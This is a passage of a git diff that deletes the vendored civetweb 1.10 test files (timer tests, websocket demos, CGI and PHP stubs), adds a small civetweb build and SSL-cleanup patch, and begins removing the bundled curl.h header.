-    printf("conn:  %.0lf\n", difftime(t2,t1));
-    printf("write: %.0lf\n", difftime(t3,t2));
-    printf("read:  %.0lf\n", difftime(t4,t3));
-
-    for (i=-10;i<1000;i++) {
-        int j,cnt=0;
-        for(j=0;j<con_count;j++) {
-            if (result[j]==i) cnt++;
-        }
-        if (cnt>0) {
-            printf("%5i\t%7i\n", i, cnt);
-        }
-    }
-
-    return 0;
-}
-
-
diff --git a/thirdparty/civetweb-1.10/test/timeout.cgi b/thirdparty/civetweb-1.10/test/timeout.cgi
deleted file mode 100755
index 3248205..0000000
--- a/thirdparty/civetweb-1.10/test/timeout.cgi
+++ /dev/null
@@ -1,12 +0,0 @@
-#!/usr/bin/env perl
-
-# Make stdout unbuffered
-use FileHandle;
-STDOUT->autoflush(1);
-
-# This script outputs some content, then sleeps for 5 seconds, then exits.
-# Web server should return the content immediately after it is sent,
-# not waiting until the script exits.
-print "Content-Type: text/html\r\n\r\n";
-print "Some data";
-sleep 3;
diff --git a/thirdparty/civetweb-1.10/test/timertest.c b/thirdparty/civetweb-1.10/test/timertest.c
deleted file mode 100644
index 3ee98dc..0000000
--- a/thirdparty/civetweb-1.10/test/timertest.c
+++ /dev/null
@@ -1,350 +0,0 @@
-/* Copyright (c) 2016-2017 the Civetweb developers
- *
- * Permission is hereby granted, free of charge, to any person obtaining a copy
- * of this software and associated documentation files (the "Software"), to deal
- * in the Software without restriction, including without limitation the rights
- * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
- * copies of the Software, and to permit persons to whom the Software is
- * furnished to do so, subject to the following conditions:
- *
- * The above copyright notice and this permission notice shall be included in
- * all copies or substantial portions of the Software.
- *
- * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
- * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
- * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
- * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
- * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
- * THE SOFTWARE.
- */
-
-/**
- * We include the source file so that we have access to the internal private
- * static functions
- */
-#ifdef _MSC_VER
-#ifndef _CRT_SECURE_NO_WARNINGS
-#define _CRT_SECURE_NO_WARNINGS
-#endif
-#endif
-
-#if defined(__GNUC__)
-#pragma GCC diagnostic push
-#pragma GCC diagnostic ignored "-Wunused-function"
-#endif
-
-#define CIVETWEB_API static
-#define USE_TIMERS
-
-#include "../src/civetweb.c"
-
-#include <stdlib.h>
-#include <time.h>
-
-#include "timertest.h"
-
-static int action_dec_ret;
-
-static int
-action_dec(void *arg)
-{
-	int *p = (int *)arg;
-	(*p)--;
-
-	if (*p < -1) {
-		ck_abort_msg("Periodic timer called too often");
-		/* return 0 here would be unreachable code */
-	}
-
-	return (*p >= -3) ? action_dec_ret : 0;
-}
-
-
-static int
-action_dec_to_0(void *arg)
-{
-	int *p = (int *)arg;
-	(*p)--;
-
-	if (*p <= -1) {
-		ck_abort_msg("Periodic timer called too often");
-		/* return 0 here would be unreachable code */
-	}
-
-	return (*p > 0);
-}
-
-
-START_TEST(test_timer_cyclic)
-{
-	struct mg_context ctx;
-	int c[10];
-	memset(&ctx, 0, sizeof(ctx));
-	memset(c, 0, sizeof(c));
-
-	action_dec_ret = 1;
-
-	mark_point();
-	timers_init(&ctx);
-	mg_sleep(100);
-	mark_point();
-
-	c[0] = 100;
-	timer_add(&ctx, 0.05, 0.1, 1, action_dec, c + 0);
-	c[2] = 20;
-	timer_add(&ctx, 0.25, 0.5, 1, action_dec, c + 2);
-	c[1] = 50;
-	timer_add(&ctx, 0.1, 0.2, 1, action_dec, c + 1);
-
-	mark_point();
-
-	mg_sleep(10000); /* Sleep 10 second - timers will run */
-
-	mark_point();
-	ctx.stop_flag = 99; /* End timer thread */
-	mark_point();
-
-	mg_sleep(2000); /* Sleep 2 second - timers will not run */
-
-	mark_point();
-
-	timers_exit(&ctx);
-
-	mark_point();
-
-	/* If this test runs in a virtual environment, like the CI unit test
-	 * containers, there might be some timing deviations, so check the
-	 * counter with some tolerance. */
-
-	ck_assert_int_ge(c[0], -1);
-	ck_assert_int_le(c[0], +1);
-	ck_assert_int_ge(c[1], -1);
-	ck_assert_int_le(c[1], +1);
-	ck_assert_int_ge(c[2], -1);
-	ck_assert_int_le(c[2], +1);
-}
-END_TEST
-
-
-START_TEST(test_timer_oneshot_by_callback_retval)
-{
-	struct mg_context ctx;
-	int c[10];
-	memset(&ctx, 0, sizeof(ctx));
-	memset(c, 0, sizeof(c));
-
-	action_dec_ret = 0;
-
-	mark_point();
-	timers_init(&ctx);
-	mg_sleep(100);
-	mark_point();
-
-	c[0] = 10;
-	timer_add(&ctx, 0, 0.1, 1, action_dec, c + 0);
-	c[2] = 2;
-	timer_add(&ctx, 0, 0.5, 1, action_dec, c + 2);
-	c[1] = 5;
-	timer_add(&ctx, 0, 0.2, 1, action_dec, c + 1);
-
-	mark_point();
-
-	mg_sleep(1000); /* Sleep 1 second - timer will run */
-
-	mark_point();
-	ctx.stop_flag = 99; /* End timer thread */
-	mark_point();
-
-	mg_sleep(1000); /* Sleep 1 second - timer will not run */
-
-	mark_point();
-
-	timers_exit(&ctx);
-
-	mark_point();
-	mg_sleep(100);
-
-	ck_assert_int_eq(c[0], 9);
-	ck_assert_int_eq(c[1], 4);
-	ck_assert_int_eq(c[2], 1);
-}
-END_TEST
-
-
-START_TEST(test_timer_oneshot_by_timer_add)
-{
-	struct mg_context ctx;
-	int c[10];
-	memset(&ctx, 0, sizeof(ctx));
-	memset(c, 0, sizeof(c));
-
-	action_dec_ret = 1;
-
-	mark_point();
-	timers_init(&ctx);
-	mg_sleep(100);
-	mark_point();
-
-	c[0] = 10;
-	timer_add(&ctx, 0, 0, 1, action_dec, c + 0);
-	c[2] = 2;
-	timer_add(&ctx, 0, 0, 1, action_dec, c + 2);
-	c[1] = 5;
-	timer_add(&ctx, 0, 0, 1, action_dec, c + 1);
-
-	mark_point();
-
-	mg_sleep(1000); /* Sleep 1 second - timer will run */
-
-	mark_point();
-	ctx.stop_flag = 99; /* End timer thread */
-	mark_point();
-
-	mg_sleep(1000); /* Sleep 1 second - timer will not run */
-
-	mark_point();
-
-	timers_exit(&ctx);
-
-	mark_point();
-	mg_sleep(100);
-
-	ck_assert_int_eq(c[0], 9);
-	ck_assert_int_eq(c[1], 4);
-	ck_assert_int_eq(c[2], 1);
-}
-END_TEST
-
-
-START_TEST(test_timer_mixed)
-{
-	struct mg_context ctx;
-	int c[10];
-	memset(&ctx, 0, sizeof(ctx));
-	memset(c, 0, sizeof(c));
-
-	mark_point();
-	timers_init(&ctx);
-	mg_sleep(100);
-	mark_point();
-
-	/* 3 --> 2, because it is a single shot timer */
-	c[0] = 3;
-	timer_add(&ctx, 0, 0, 1, action_dec_to_0, &c[0]);
-
-	/* 3 --> 0, because it will run until c[1] = 0 and then stop */
-	c[1] = 3;
-	timer_add(&ctx, 0, 0.2, 1, action_dec_to_0, &c[1]);
-
-	/* 3 --> 1, with 750 ms period, it will run once at start,
-	 * then once 750 ms later, but not 1500 ms later, since the
-	 * timer is already stopped then. */
-	c[2] = 3;
-	timer_add(&ctx, 0, 0.75, 1, action_dec_to_0, &c[2]);
-
-	/* 3 --> 2, will run at start, but no cyclic in 1 second */
-	c[3] = 3;
-	timer_add(&ctx, 0, 2.5, 1, action_dec_to_0, &c[3]);
-
-	/* 3 --> 3, will not run at start */
-	c[4] = 3;
-	timer_add(&ctx, 2.5, 0.1, 1, action_dec_to_0, &c[4]);
-
-	/* 3 --> 2, an absolute timer in the past (-123.456) will still
-	 * run once at start, and then with the period */
-	c[5] = 3;
-	timer_add(&ctx, -123.456, 2.5, 0, action_dec_to_0, &c[5]);
-
-	/* 3 --> 1, an absolute timer in the past (-123.456) will still
-	 * run once at start, and then with the period */
-	c[6] = 3;
-	timer_add(&ctx, -123.456, 0.75, 0, action_dec_to_0, &c[6]);
-
-	mark_point();
-
-	mg_sleep(1000); /* Sleep 1 second - timer will run */
-
-	mark_point();
-	ctx.stop_flag = 99; /* End timer thread */
-	mark_point();
-
-	mg_sleep(1000); /* Sleep 1 second - timer will not run */
-
-	mark_point();
-
-	timers_exit(&ctx);
-
-	mark_point();
-	mg_sleep(100);
-
-	ck_assert_int_eq(c[0], 2);
-	ck_assert_int_eq(c[1], 0);
-	ck_assert_int_eq(c[2], 1);
-	ck_assert_int_eq(c[3], 2);
-	ck_assert_int_eq(c[4], 3);
-	ck_assert_int_eq(c[5], 2);
-	ck_assert_int_eq(c[6], 1);
-}
-END_TEST
-
-
-#if !defined(REPLACE_CHECK_FOR_LOCAL_DEBUGGING)
-Suite *
-make_timertest_suite(void)
-{
-	Suite *const suite = suite_create("Timer");
-
-	TCase *const tcase_timer_cyclic = tcase_create("Timer Periodic");
-	TCase *const tcase_timer_oneshot = tcase_create("Timer Single Shot");
-	TCase *const tcase_timer_mixed = tcase_create("Timer Mixed");
-
-	tcase_add_test(tcase_timer_cyclic, test_timer_cyclic);
-	tcase_set_timeout(tcase_timer_cyclic, 30);
-	suite_add_tcase(suite, tcase_timer_cyclic);
-
-	tcase_add_test(tcase_timer_oneshot, test_timer_oneshot_by_timer_add);
-	tcase_add_test(tcase_timer_oneshot, test_timer_oneshot_by_callback_retval);
-	tcase_set_timeout(tcase_timer_oneshot, 30);
-	suite_add_tcase(suite, tcase_timer_oneshot);
-
-	tcase_add_test(tcase_timer_mixed, test_timer_mixed);
-	tcase_set_timeout(tcase_timer_mixed, 30);
-	suite_add_tcase(suite, tcase_timer_mixed);
-
-	return suite;
-}
-#endif
-
-
-#ifdef REPLACE_CHECK_FOR_LOCAL_DEBUGGING
-/* Used to debug test cases without using the check framework */
-
-void
-TIMER_PRIVATE(void)
-{
-	unsigned f_avail;
-	unsigned f_ret;
-
-#if defined(_WIN32)
-	WSADATA data;
-	WSAStartup(MAKEWORD(2, 2), &data);
-#endif
-
-	f_avail = mg_check_feature(0xFF);
-	f_ret = mg_init_library(f_avail);
-	ck_assert_uint_eq(f_ret, f_avail);
-
-	test_timer_cyclic(0);
-	test_timer_oneshot_by_timer_add(0);
-	test_timer_oneshot_by_callback_retval(0);
-	test_timer_mixed(0);
-
-	mg_exit_library();
-
-#if defined(_WIN32)
-	WSACleanup();
-#endif
-}
-
-#endif
diff --git a/thirdparty/civetweb-1.10/test/timertest.h b/thirdparty/civetweb-1.10/test/timertest.h
deleted file mode 100644
index 844a01b..0000000
--- a/thirdparty/civetweb-1.10/test/timertest.h
+++ /dev/null
@@ -1,28 +0,0 @@
-/* Copyright (c) 2015 the Civetweb developers
- *
- * Permission is hereby granted, free of charge, to any person obtaining a copy
- * of this software and associated documentation files (the "Software"), to deal
- * in the Software without restriction, including without limitation the rights
- * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
- * copies of the Software, and to permit persons to whom the Software is
- * furnished to do so, subject to the following conditions:
- *
- * The above copyright notice and this permission notice shall be included in
- * all copies or substantial portions of the Software.
- *
- * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
- * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
- * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
- * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
- * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
- * THE SOFTWARE.
- */
-#ifndef TEST_TIMER_H_
-#define TEST_TIMER_H_
-
-#include "civetweb_check.h"
-
-Suite *make_timertest_suite(void);
-
-#endif /* TEST_TIMER_H_ */
diff --git a/thirdparty/civetweb-1.10/test/websocket.lua b/thirdparty/civetweb-1.10/test/websocket.lua
deleted file mode 100644
index 7338ed8..0000000
--- a/thirdparty/civetweb-1.10/test/websocket.lua
+++ /dev/null
@@ -1,118 +0,0 @@
-timerID = "timeout"
---timerID = "interval"
-
-function trace(text)
-    local f = io.open("websocket.trace", "a")
-    f:write(os.date() .. " - " .. text .. "\n")
-    f:close()
-end
-
-function iswebsocket()
-  return mg.lua_type == "websocket"
-  --return pcall(function()
-  --  if (string.upper(mg.request_info.http_headers.Upgrade)~="WEBSOCKET") then error("") end
-  --end)
-end
-
-trace("called with Lua type " .. tostring(mg.lua_type))
-
-if not iswebsocket() then
-  trace("no websocket")
-  mg.write("HTTP/1.0 403 Forbidden\r\n")
-  mg.write("Connection: close\r\n")
-  mg.write("\r\n")
-  mg.write("forbidden")
-  return
-end
-
-
--- Serialize table to string
-function ser(val)
-  local t
-  if type(val) == "table" then
-    for k,v in pairs(val) do
-      if t then
-        t = t .. ", " .. ser(k) .. "=" .. ser(v)
-      else
-        t = "{" .. ser(k) .. "=" .. ser(v)
-      end
-    end
-    t = t .. "}"
-  else
-    t = tostring(val)
-  end
-  return t
-end
-
--- table of all active connection
-allConnections = {}
-
--- function to get a client identification string
-function who(tab)
-  local ri = allConnections[tab.client].request_info
-  return ri.remote_addr .. ":" .. ri.remote_port
-end
-
--- Callback to accept or reject a connection
-function open(tab)
-  allConnections[tab.client] = tab
-  trace("open[" .. who(tab) .. "]: " .. ser(tab))
-  return true -- return true to accept the connection
-end
-
--- Callback for "Websocket ready"
-function ready(tab)
-  trace("ready[" .. who(tab) .. "]: " .. ser(tab))
-  mg.write(tab.client, "text", "Websocket ready")
-  mg.write(tab.client, 1, "-->h 180");
-  mg.write(tab.client, "-->m 180");
-  senddata()
-  if timerID == "timeout" then
-    mg.set_timeout("timer()", 1)
-  elseif timerID == "interval" then
-    mg.set_interval("timer()", 1)
-  end
-  return true -- return true to keep the connection open
-end
-
--- Callback for "Websocket received data"
-function data(tab)
-    trace("data[" .. who(tab) .. "]: " .. ser(tab))
-    senddata()
-    return true -- return true to keep the connection open
-end
-
--- Callback for "Websocket is closing"
-function close(tab)
-    trace("close[" .. who(tab) .. "]: " .. ser(tab))
-    mg.write("text", "end")
-    allConnections[tab.client] = nil
-end
-
-function senddata()
-    local date = os.date('*t');
-    local hand = (date.hour%12)*60+date.min;
-
-    mg.write("text", string.format("%u:%02u:%02u", date.hour, date.min, date.sec));
-
-    if (hand ~= lasthand) then
-        mg.write(1, string.format("-->h %u", hand*360/(12*60)));
-        mg.write(   string.format("-->m %u", date.min*360/60));
-        lasthand = hand;
-    end
-
-    if bits and content then
-        data(bits, content)
-    end
-end
-
-function timer()
-    trace("timer")
-    senddata()
-    if timerID == "timeout" then
-        mg.set_timeout("timer()", 1)
-    else
-        return true -- return true to keep an interval timer running
-    end
-end
-
diff --git a/thirdparty/civetweb-1.10/test/websocket.xhtml b/thirdparty/civetweb-1.10/test/websocket.xhtml
deleted file mode 100644
index 3e0828f..0000000
--- a/thirdparty/civetweb-1.10/test/websocket.xhtml
+++ /dev/null
@@ -1,117 +0,0 @@
-<!DOCTYPE HTML>

-<html xmlns="http://www.w3.org/1999/xhtml">

-<head>

-  <meta charset="UTF-8"></meta>

-  <title>Websocket test</title>

-  <style type="text/css" media="screen">

-    body { background:#eee; margin:0 }

-    .main {

-      display:block; border:1px solid #ccc; position:absolute;

-      top:5%; left:5%; width:90%; height:90%; background:#fff;

-    }

-  </style>

-</head>

-<body>

-  <script type="text/javascript"><![CDATA[

-

-    var connection;

-    var websock_text_field;

-    var hand_hour;

-    var hand_min;

-

-    function queryStringElem(name, idx) {

-      if (typeof(queryStringElem_Table) != "object") {

-        queryStringElem_Table = {};

-        window.location.search.slice(1).split('&').forEach(

-          function(keyValuePair) {

-            keyValuePair = keyValuePair.split('=');

-            if (typeof(queryStringElem_Table[keyValuePair[0]]) != "object") {

-              queryStringElem_Table[keyValuePair[0]] = [];

-            }

-            var idx = queryStringElem_Table[keyValuePair[0]].length+1;

-            queryStringElem_Table[keyValuePair[0]][idx] = keyValuePair[1] || '';

-          }

-        );

-      }

-      idx = idx || 1;

-      if (queryStringElem_Table[name]) {

-        return queryStringElem_Table[name][idx];

-      }

-      return null;

-    }

-

-    function webSockKeepAlive() {

-      if (keepAlive) {

-        connection.send('client still alive');

-        console.log('send keep alive')

-        setTimeout("webSockKeepAlive()", 10000);

-      }

-    }

-

-    function load() {

-      var wsproto = (location.protocol === 'https:') ? "wss:" : "ws:";

-      connection = new WebSocket(wsproto + "//" + window.location.host + "/websocket.lua");

-      websock_text_field = document.getElementById('websock_text_field');

-      hand_min = document.getElementById('hand_min');

-      hand_hour = document.getElementById('hand_hour');

-

-      var ka = queryStringElem("keepAlive");

-      if (ka) {

-        ka = ka.toLowerCase();

-        use_keepAlive = (ka!="false") && (ka!="f") && (ka!="no") && (ka!="n") && (ka!=0);

-      } else {

-        use_keepAlive = true;

-      }

-

-      connection.onopen = function () {

-        keepAlive = use_keepAlive;

-        webSockKeepAlive();

-      };

-

-      // Log errors

-      connection.onerror = function (error) {

-        keepAlive = false;

-        alert("WebSocket error");

-        connection.close();

-      };

-

-      // Log messages from the server

-      connection.onmessage = function (e) {

-        var lCmd = e.data.substring(0,3);

-        if (lCmd == "-->") {

-          console.log(e.data);

-          var lDirection = Number(e.data.substring(5));

-          if (e.data[3] == 'h') {

-            hand_hour.setAttribute("transform", "rotate(" + lDirection + " 800 600)");

-          }

-          if (e.data[3] == 'm') {

-            hand_min.setAttribute("transform", "rotate(" + lDirection + " 800 600)");

-          }

-        } else {

-          websock_text_field.textContent = e.data;

-        }

-      };

-

-      console.log("load");

-    }

-

-  ]]></script>

-

-<svg class="main"

-  xmlns="http://www.w3.org/2000/svg"

-  xmlns:svg="http://www.w3.org/2000/svg"

-  version="1.1"

-  xmlns:xlink="http://www.w3.org/1999/xlink"

-  viewBox="0 0 1600 1200" preserveAspectRatio="xMinYMin meet"

-  onload="load()"

-  >

-

-  <circle id="line_a" cx="800" cy="600" r="500" style="stroke:rgb(255,0,0); stroke-width:5; fill:rgb(200,200,200)"/>

-  <polygon points="800,200 900,300 850,300 850,600 750,600 750,300 700,300" style="fill:rgb(100,0,0)" transform="rotate(0,800,600)" id="hand_hour"/>

-  <polygon points="800,100 840,200 820,200 820,600 780,600 780,200 760,200" style="fill:rgb(0,100,0)" transform="rotate(0,800,600)" id="hand_min"/>

-  <text id="websock_text_field" x="800" y="600" text-anchor="middle" font-size="50px" fill="red">No websocket connection yet</text>

-

-</svg>

-

-</body>

-</html>

diff --git a/thirdparty/civetweb-1.10/test/windows.cgi b/thirdparty/civetweb-1.10/test/windows.cgi
deleted file mode 100644
index d8aaabc..0000000
--- a/thirdparty/civetweb-1.10/test/windows.cgi
+++ /dev/null
@@ -1,2 +0,0 @@
-#!windows.cgi.cmd

-

diff --git a/thirdparty/civetweb-1.10/test/windows.cgi.cmd b/thirdparty/civetweb-1.10/test/windows.cgi.cmd
deleted file mode 100644
index 779abad..0000000
--- a/thirdparty/civetweb-1.10/test/windows.cgi.cmd
+++ /dev/null
@@ -1,7 +0,0 @@
-@echo off
-@rem echo HTTP/1.1 200 OK -- sent by framework
-echo Connection: close
-echo.
-echo CGI test:
-echo.
-set
diff --git a/thirdparty/civetweb-1.10/test/windows_fail.cgi b/thirdparty/civetweb-1.10/test/windows_fail.cgi
deleted file mode 100644
index 606fbd2..0000000
--- a/thirdparty/civetweb-1.10/test/windows_fail.cgi
+++ /dev/null
@@ -1,2 +0,0 @@
-#!r:\windows_fail.cgi.cmd

-

diff --git a/thirdparty/civetweb-1.10/test/windows_fail.cgi.cmd b/thirdparty/civetweb-1.10/test/windows_fail.cgi.cmd
deleted file mode 100644
index 715c061..0000000
--- a/thirdparty/civetweb-1.10/test/windows_fail.cgi.cmd
+++ /dev/null
@@ -1,2 +0,0 @@
-@echo off
-echo Some error sent to stderr 1>&2
diff --git a/thirdparty/civetweb-1.10/test/windows_fail_silent.cgi b/thirdparty/civetweb-1.10/test/windows_fail_silent.cgi
deleted file mode 100644
index 198225a..0000000
--- a/thirdparty/civetweb-1.10/test/windows_fail_silent.cgi
+++ /dev/null
@@ -1,2 +0,0 @@
-#!r:\windows_fail_silent.cgi.cmd

-

diff --git a/thirdparty/civetweb-1.10/test/windows_fail_silent.cgi.cmd b/thirdparty/civetweb-1.10/test/windows_fail_silent.cgi.cmd
deleted file mode 100644
index bb2bf1b..0000000
--- a/thirdparty/civetweb-1.10/test/windows_fail_silent.cgi.cmd
+++ /dev/null
@@ -1,3 +0,0 @@
-@echo off
-echo not a complete header
-echo and nothing sent to stderr
diff --git a/thirdparty/civetweb-1.10/test/ws_status.lua b/thirdparty/civetweb-1.10/test/ws_status.lua
deleted file mode 100644
index a19505b..0000000
--- a/thirdparty/civetweb-1.10/test/ws_status.lua
+++ /dev/null
@@ -1,137 +0,0 @@
-if mg.lua_type ~= "websocket" then
-  mg.write("HTTP/1.0 200 OK\r\n")
-  mg.write("Connection: close\r\n")
-  mg.write("\r\n")
-  mg.write("<!DOCTYPE HTML>\r\n")
-  mg.write("<html xmlns=\"http://www.w3.org/1999/xhtml\">\r\n")
-  mg.write("<head>\r\n")
-  mg.write("<meta charset=\"UTF-8\"></meta>\r\n")
-  mg.write("<title>Server stats</title>\r\n")
-  mg.write("</head>\r\n")
-  mg.write("<body onload=\"load()\">\r\n")
-  mg.write([====[
-  <script type="text/javascript">
-
-    var connection;
-    var data_field;
-
-    function webSockKeepAlive() {
-      if (keepAlive) {
-        connection.send('Ok');
-        setTimeout("webSockKeepAlive()", 10000);
-      }
-    }
-
-    function load() {
-      var wsproto = (location.protocol === 'https:') ? "wss:" : "ws:";
-      connection = new WebSocket(wsproto + "//" + window.location.host + window.location.pathname);
-      data_field = document.getElementById('data');
-
-      data_field.innerHTML = "wait for data";
-
-      use_keepAlive = true;
-
-      connection.onopen = function () {
-        keepAlive = use_keepAlive;
-        webSockKeepAlive();
-      };
-
-      // Log errors
-      connection.onerror = function (error) {
-        keepAlive = false;
-        alert("WebSocket error");
-        connection.close();
-      };
-
-      // Log messages from the server
-      connection.onmessage = function (e) {
-          data_field.innerHTML = e.data;
-      };
-    }
-
-</script>
-]====])
-
-  mg.write("<div id='data'>Wait for page load</div>\r\n")
-  mg.write("</body>\r\n")
-  mg.write("</html>\r\n")
-  return
-end
-
-
-function table.count(tab)
-  local count = 0
-  for _ in pairs(tab) do
-    count = count + 1
-  end
-  return count
-end
-
-
--- table of all active connection
-allConnections = {}
-connCount = table.count(allConnections)
-
-
--- function to get a client identification string
-function who(tab)
-  local ri = allConnections[tab.client].request_info
-  return ri.remote_addr .. ":" .. ri.remote_port
-end
-
--- Callback to accept or reject a connection
-function open(tab)
-  allConnections[tab.client] = tab
-  connCount = table.count(allConnections)
-  return true -- return true to accept the connection
-end
-
--- Callback for "Websocket ready"
-function ready(tab)
-  senddata()
-  return true -- return true to keep the connection open
-end
-
--- Callback for "Websocket received data"
-function data(tab)
-    senddata()
-    return true -- return true to keep the connection open
-end
-
--- Callback for "Websocket is closing"
-function close(tab)
-    allConnections[tab.client] = nil
-    connCount = table.count(allConnections)
-end
-
-function senddata()
-    local date = os.date('*t');
-
-    collectgarbage("collect"); -- Avoid adding uncollected Lua memory from this state
-
-    mg.write(string.format([[
-{"Time": "%u:%02u:%02u",
- "Date": "%04u-%02u-%02u",
- "Context": %s,
- "Common": %s,
- "System": \"%s\",
- "ws_status": {"Memory": %u, "Connections": %u}
-}]],
-date.hour, date.min, date.sec,
-date.year, date.month, date.day,
-mg.get_info("context"), 
-mg.get_info("common"), 
-mg.get_info("system"),
-collectgarbage("count")*1024,
-connCount
-));
-
-end
-
-function timer()
-    senddata()
-    mg.set_timeout("timer()", 1)    
-end
-
-mg.set_timeout("timer()", 1)
-
diff --git a/thirdparty/civetweb-1.10/test/x.php b/thirdparty/civetweb-1.10/test/x.php
deleted file mode 100644
index cd32842..0000000
--- a/thirdparty/civetweb-1.10/test/x.php
+++ /dev/null
@@ -1,9 +0,0 @@
-<html>
-  <form method="post">
-    <input name="x" type="text" />
-    <input type="submit" />
-  </form>
-
-  <? echo $_POST["x"]; ?>
-  
-</html>
diff --git a/thirdparty/civetweb/civetweb.patch b/thirdparty/civetweb/civetweb.patch
new file mode 100644
index 0000000..c55ce58
--- /dev/null
+++ b/thirdparty/civetweb/civetweb.patch
@@ -0,0 +1,61 @@
+diff --git a/CMakeLists.txt b/CMakeLists.txt
+index 2c08bd28..ccb4fd7f 100644
+--- a/CMakeLists.txt
++++ b/CMakeLists.txt
+@@ -101,7 +101,7 @@ message(STATUS "Lua CGI support - ${CIVETWEB_ENABLE_LUA}")
+ # Enable installing CivetWeb executables
+ option(CIVETWEB_INSTALL_EXECUTABLE "Enable installing CivetWeb executable" ON)
+ mark_as_advanced(FORCE CIVETWEB_INSTALL_EXECUTABLE) # Advanced users can disable
+-message(STATUS "Executable installation - ${CIVETWEB_INSTALL_EXECUTABLE}") 
++message(STATUS "Executable installation - ${CIVETWEB_INSTALL_EXECUTABLE}")
+ 
+ # Allow builds to complete with warnings (do not set -Werror)
+ # CivetWeb Linux support is stable:
+@@ -294,8 +294,8 @@ if (MINGW)
+ endif()
+ if (NOT CIVETWEB_ALLOW_WARNINGS)
+   add_c_compiler_flag(-Werror)
++  add_c_compiler_flag(/WX)
+ endif()
+-add_c_compiler_flag(/WX)
+ add_c_compiler_flag(-pedantic-errors)
+ add_c_compiler_flag(-fvisibility=hidden)
+ add_c_compiler_flag(-fstack-protector-strong RELEASE)
+diff --git a/src/civetweb.c b/src/civetweb.c
+index c0ccbaa2..c692d1c8 100644
+--- a/src/civetweb.c
++++ b/src/civetweb.c
+@@ -14202,7 +14202,7 @@ ssl_get_protocol(int version_id)
+  * https://www.openssl.org/docs/man1.1.0/ssl/SSL_set_info_callback.html
+  * https://linux.die.net/man/3/ssl_set_info_callback */
+ static void
+-ssl_info_callback(SSL *ssl, int what, int ret)
++ssl_info_callback(const SSL *ssl, int what, int ret)
+ {
+ 	(void)ret;
+ 
+@@ -16237,10 +16237,13 @@ worker_thread_run(struct worker_thread_args *thread_args)
+ 					mg_free(conn->request_info.client_cert);
+ 					conn->request_info.client_cert = 0;
+ 				}
+-			}
++			} else {
++        /* make sure the connection is cleaned up on SSL failure */
++        close_connection(conn);
++      }
+ #endif
+-		} else {
+-			/* process HTTP connection */
++    } else {
++      /* process HTTP connection */
+ 			process_new_connection(conn);
+ 		}
+ 
+@@ -17249,7 +17252,6 @@ mg_get_system_info_impl(char *buffer, int buflen)
+ #pragma GCC diagnostic push
+ /* Disable bogus compiler warning -Wdate-time */
+ #pragma GCC diagnostic ignored "-Wall"
+-#pragma GCC diagnostic ignored "-Werror"
+ #endif
+ 		mg_snprintf(NULL,
+ 		            NULL,
diff --git a/thirdparty/curl/include/curl/curl.h b/thirdparty/curl/include/curl/curl.h
deleted file mode 100644
index fa019ec..0000000
--- a/thirdparty/curl/include/curl/curl.h
+++ /dev/null
@@ -1,2774 +0,0 @@
-#ifndef __CURL_CURL_H
-#define __CURL_CURL_H
-/***************************************************************************
- *                                  _   _ ____  _
- *  Project                     ___| | | |  _ \| |
- *                             / __| | | | |_) | |
- *                            | (__| |_| |  _ <| |___
- *                             \___|\___/|_| \_\_____|
- *
- * Copyright (C) 1998 - 2018, Daniel Stenberg, <daniel@haxx.se>, et al.
- *
- * This software is licensed as described in the file COPYING, which
- * you should have received as part of this distribution. The terms
- * are also available at https://curl.haxx.se/docs/copyright.html.
- *
- * You may opt to use, copy, modify, merge, publish, distribute and/or sell
- * copies of the Software, and permit persons to whom the Software is
- * furnished to do so, under the terms of the COPYING file.
- *
- * This software is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY
- * KIND, either express or implied.
- *
- ***************************************************************************/
-
-/*
- * If you have libcurl problems, all docs and details are found here:
- *   https://curl.haxx.se/libcurl/
- *
- * curl-library mailing list subscription and unsubscription web interface:
- *   https://cool.haxx.se/mailman/listinfo/curl-library/
- */
-
-#ifdef CURL_NO_OLDIES
-#define CURL_STRICTER
-#endif
-
-#include "curlver.h"         /* libcurl version defines   */
-#include "system.h"          /* determine things run-time */
-
-/*
- * Define WIN32 when build target is Win32 API
- */
-
-#if (defined(_WIN32) || defined(__WIN32__)) && \
-     !defined(WIN32) && !defined(__SYMBIAN32__)
-#define WIN32
-#endif
-
-#include <stdio.h>
-#include <limits.h>
-
-#if defined(__FreeBSD__) && (__FreeBSD__ >= 2)
-/* Needed for __FreeBSD_version symbol definition */
-#include <osreldate.h>
-#endif
-
-/* The include stuff here below is mainly for time_t! */
-#include <sys/types.h>
-#include <time.h>
-
-#if defined(WIN32) && !defined(_WIN32_WCE) && !defined(__CYGWIN__)
-#if !(defined(_WINSOCKAPI_) || defined(_WINSOCK_H) || \
-      defined(__LWIP_OPT_H__) || defined(LWIP_HDR_OPT_H))
-/* The check above prevents the winsock2 inclusion if winsock.h already was
-   included, since they can't co-exist without problems */
-#include <winsock2.h>
-#include <ws2tcpip.h>
-#endif
-#endif
-
-/* HP-UX systems version 9, 10 and 11 lack sys/select.h and so does oldish
-   libc5-based Linux systems. Only include it on systems that are known to
-   require it! */
-#if defined(_AIX) || defined(__NOVELL_LIBC__) || defined(__NetBSD__) || \
-    defined(__minix) || defined(__SYMBIAN32__) || defined(__INTEGRITY) || \
-    defined(ANDROID) || defined(__ANDROID__) || defined(__OpenBSD__) || \
-    defined(__CYGWIN__) || \
